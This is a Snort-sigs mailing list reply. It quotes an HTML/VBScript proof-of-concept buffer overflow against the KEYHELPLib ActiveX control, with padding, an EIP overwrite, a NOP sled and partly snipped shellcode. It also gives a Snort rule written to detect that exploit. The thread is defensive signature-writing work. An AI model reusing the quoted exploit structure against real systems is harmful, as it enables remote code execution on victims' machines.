Re: Problem writing a sig to capture vbscript unescape sequence

[Balasubramaniam Natarajan <bala150985 () gmail com>]

Hi Bob,

See if this works

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible ActiveX
overflow via VB Script"; flow:established,from_server; content:"|65 69 70
20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 36 37 25 34 31 25 34 31 25 37 65
22 29|"; sid:10000111; rev:1;)

On Fri, May 18, 2012 at 11:22 PM, Bob Huber <roberthuberjr () yahoo com> wrote:

> I'm trying to write a sig for this ActiveX overflow:
>
> <html>
> <body>
> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
> id='KEYHELPLib' />
> </object>
> <script language='vbscript'>
> //executing calc
> scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
> & _
>              ...SNIP...
>              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
> jnk = string(537,"A")
> eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
> nop = string(16,unescape("%90"))
> mapID=1
> pstrChmFile= jnk + eip + nop + scode
> pstrFrame="aaaaaaaa"
> 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
> KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
> </script>
> </body>
> </html>
>
> The problem I'm having is trying to get a content match off of the line -
>    eip = unescape("%67%41%41%7e")
> I can't figure out how to match that content.  I'm running both 2.8.5 and
> 2.9.2.  I was assuming it would see the <script> tag and it would try to
> decode javascript, and maybe that was the problem.  I've tried file_data,
> I've tried pkt_data. I've turned off javascript normalization, I've turned
> off extended_response_inspection.  No luck.
>
> Any help appreciated.
>
> Bob
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs () lists sourceforge net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
>
>
> Please visit http://blog.snort.org for the latest news about Snort!



-- 
Regards,
Balasubramaniam Natarajan
www.etutorshop.com/moodle/

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!